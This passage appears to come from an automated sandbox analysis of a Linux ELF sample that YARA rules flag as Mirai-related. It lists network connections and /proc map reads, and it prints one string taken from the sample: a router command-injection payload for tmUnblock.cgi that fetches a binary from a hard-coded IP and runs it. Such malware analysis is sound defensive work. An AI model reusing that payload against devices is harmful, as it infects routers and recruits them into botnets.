              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53836
              Source: unknownNetwork traffic detected: HTTP traffic on port 54430 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 42818 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52504
              Source: unknownNetwork traffic detected: HTTP traffic on port 38118 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39550
              Source: unknownNetwork traffic detected: HTTP traffic on port 39432 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52502
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39558
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38226
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38218
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40538
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39548
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40536
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41866
              Source: unknownNetwork traffic detected: HTTP traffic on port 42422 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 36538 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41864
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40534
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41860
              Source: unknownNetwork traffic detected: HTTP traffic on port 51536 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38170
              Source: unknownNetwork traffic detected: HTTP traffic on port 40036 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38172
              Source: unknownNetwork traffic detected: HTTP traffic on port 39288 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40490
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51144
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52476
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38176
              Source: unknownNetwork traffic detected: HTTP traffic on port 44376 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51142
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38178
              Source: unknownNetwork traffic detected: HTTP traffic on port 59878 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51148
              Source: unknownNetwork traffic detected: HTTP traffic on port 51176 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51152
              Source: unknownNetwork traffic detected: HTTP traffic on port 36514 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52480
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51150
              Source: unknownNetwork traffic detected: HTTP traffic on port 35922 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51164 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 36984 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 54178 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39490
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40482
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40480
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39494
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52486
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38166
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51156
              Source: unknownNetwork traffic detected: HTTP traffic on port 33236 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38168
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51154
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39498
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52490
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52494
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51160
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52492
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40474
              Source: unknownNetwork traffic detected: HTTP traffic on port 46798 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 55034 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40472
              Source: unknownNetwork traffic detected: HTTP traffic on port 40048 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 43784 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39480
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39482
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38150
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39484
              Source: unknownNetwork traffic detected: HTTP traffic on port 55046 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 33994 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51166
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52498
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38154
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51164
              Source: unknownNetwork traffic detected: HTTP traffic on port 35934 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52496
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38156
              Source: unknownNetwork traffic detected: HTTP traffic on port 60638 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 36972 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51152 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 59854 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40464
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41798
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41792
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40466
              Source: unknownNetwork traffic detected: HTTP traffic on port 56852 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 40494 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 45700 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41790
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40460
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39470
              Source: unknownNetwork traffic detected: HTTP traffic on port 50824 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 57444 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 41086 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39474
              Source: unknownNetwork traffic detected: HTTP traffic on port 33982 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51176
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39476
              Source: unknownNetwork traffic detected: HTTP traffic on port 43796 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39478
              Source: unknownNetwork traffic detected: HTTP traffic on port 34574 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49066 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40458
              Source: unknownNetwork traffic detected: HTTP traffic on port 34116 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41786
              Source: unknownNetwork traffic detected: HTTP traffic on port 33224 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40450
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41788
              Source: unknownNetwork traffic detected: HTTP traffic on port 53562 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40456
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41782
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40454
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51106
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52438
              Source: unknownNetwork traffic detected: HTTP traffic on port 44160 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53760
              Source: unknownNetwork traffic detected: HTTP traffic on port 57420 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 46604 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52430
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51104
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52436
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52434
              Source: unknownNetwork traffic detected: HTTP traffic on port 40482 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 41074 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 43326 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52448
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51118
              Source: unknownNetwork traffic detected: HTTP traffic on port 40012 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49054 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53774
              Source: unknownNetwork traffic detected: HTTP traffic on port 33536 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51112
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51110
              Source: unknownNetwork traffic detected: HTTP traffic on port 47666 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 39264 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51116
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52444
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51114
              Source: unknownNetwork traffic detected: HTTP traffic on port 56588 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 40290 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51704 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 55996 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52450
              Source: unknownNetwork traffic detected: HTTP traffic on port 54142 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51188 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 41062 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38192
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38194
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38196
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52454
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53782
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51126
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51124
              Source: unknownNetwork traffic detected: HTTP traffic on port 56840 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 43580 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 54008 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53792
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51130
              Source: unknownNetwork traffic detected: HTTP traffic on port 49042 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60880 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 33670 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 33548 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38180
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38184
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38186
              Source: unknownNetwork traffic detected: HTTP traffic on port 52694 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38188
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53796
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52462
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53794
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51132
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52468
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52466
              Source: unknownNetwork traffic detected: HTTP traffic on port 46808 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 35910 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51136
              Source: unknownNetwork traffic detected: HTTP traffic on port 60614 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 43314 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 43772 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51140
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52470
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40494
              Source: unknownNetwork traffic detected: HTTP traffic on port 57768 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40498
              Source: unknownNetwork traffic detected: HTTP traffic on port 34404 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 37418 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50260 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 33428 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 33790 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53274 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 36826 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 54250 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 34382 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51728 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60938 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 44218 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 55718 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 37660 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 43460 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60062 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 35838 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 47450 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 41182 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60086 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 41194 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 43484 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 46750 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 55706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60926 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 55960 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 36814 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 56552 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 48330 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 40194 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 36718 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 37672 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60074 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 42638 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 35826 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 52670 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 34416 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 59842 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 40170 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51188
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51186
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51196
              Source: unknownNetwork traffic detected: HTTP traffic on port 44472 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53250 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 48342 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60902 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 58132 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 33694 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 57540 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 42892 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 48354 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50800 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 44460 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 45052 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 40182 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 45916 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 34694 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53586 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50284 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 44206 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 36802 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 41170 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 47762 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51044 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53466 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 34212 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 37960 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 34946 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53454 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50956 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 36634 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 55154 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 34224 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 42074 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 39144 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53902
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53900
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53904
              Source: unknownNetwork traffic detected: HTTP traffic on port 36622 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51020 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 54298 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 42796 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53908
              Source: unknownNetwork traffic detected: HTTP traffic on port 55142 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 40362 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53912
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53918
              Source: unknownNetwork traffic detected: HTTP traffic on port 46690 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53910
              Source: unknownNetwork traffic detected: HTTP traffic on port 40398 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 56238 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 54286 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 45808 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51490 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 48654 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 55852 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 44292 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39624
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41936
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39616
              Source: unknownNetwork traffic detected: HTTP traffic on port 50920 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41932
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39618
              Source: unknownNetwork traffic detected: HTTP traffic on port 35574 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41934
              Source: unknownNetwork traffic detected: HTTP traffic on port 42050 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 39120 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 33152 -> 443

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: CuruFoiJiK.elf, type: SAMPLEMatched rule: Detects ELF malware Mirai related Author: Florian Roth
              Source: 5513.1.00007f1d38017000.00007f1d38024000.r-x.sdmp, type: MEMORYMatched rule: Detects ELF malware Mirai related Author: Florian Roth
              Source: 5517.1.00007f1d38017000.00007f1d38024000.r-x.sdmp, type: MEMORYMatched rule: Detects ELF malware Mirai related Author: Florian Roth
              Source: Initial sampleString containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://45.142.182.103/bin+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0
              Source: Initial sampleString containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://45.142.182.103/bin+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0POST /tmUnblock.cgi HTTP/1.1
              Source: ELF static info symbol of initial sample.symtab present: no
              Source: CuruFoiJiK.elf, type: SAMPLEMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
              Source: 5513.1.00007f1d38017000.00007f1d38024000.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
              Source: 5517.1.00007f1d38017000.00007f1d38024000.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
              Source: classification engineClassification label: mal80.troj.linELF@0/0@0/0
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/1185/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/3241/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/1732/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/1730/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/1333/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/1695/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/3235/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/3234/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/911/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/515/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/914/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/1617/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/1615/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/917/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/3255/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/3253/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/1591/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/3252/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/3251/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/3250/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/1623/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/1588/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/3249/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/764/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/1585/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/3246/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/766/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/800/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/888/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/802/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/1509/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/803/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/804/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/1867/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/1484/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/490/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/1514/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/1634/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/1479/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/1875/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/654/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/655/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/656/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/777/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/931/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/1595/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/657/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/812/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/779/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/658/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/933/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/418/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/419/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/3275/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/3274/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/3273/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/3272/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/782/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/3303/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/1762/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/3027/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/1486/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/789/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/1806/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/1660/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/3044/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/793/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/794/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/674/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/796/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/675/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/676/mapsJump to behavior
              Source: /tmp/CuruFoiJiK.elf (PID: 5524)File opened: /proc/1498/mapsJump to behavior
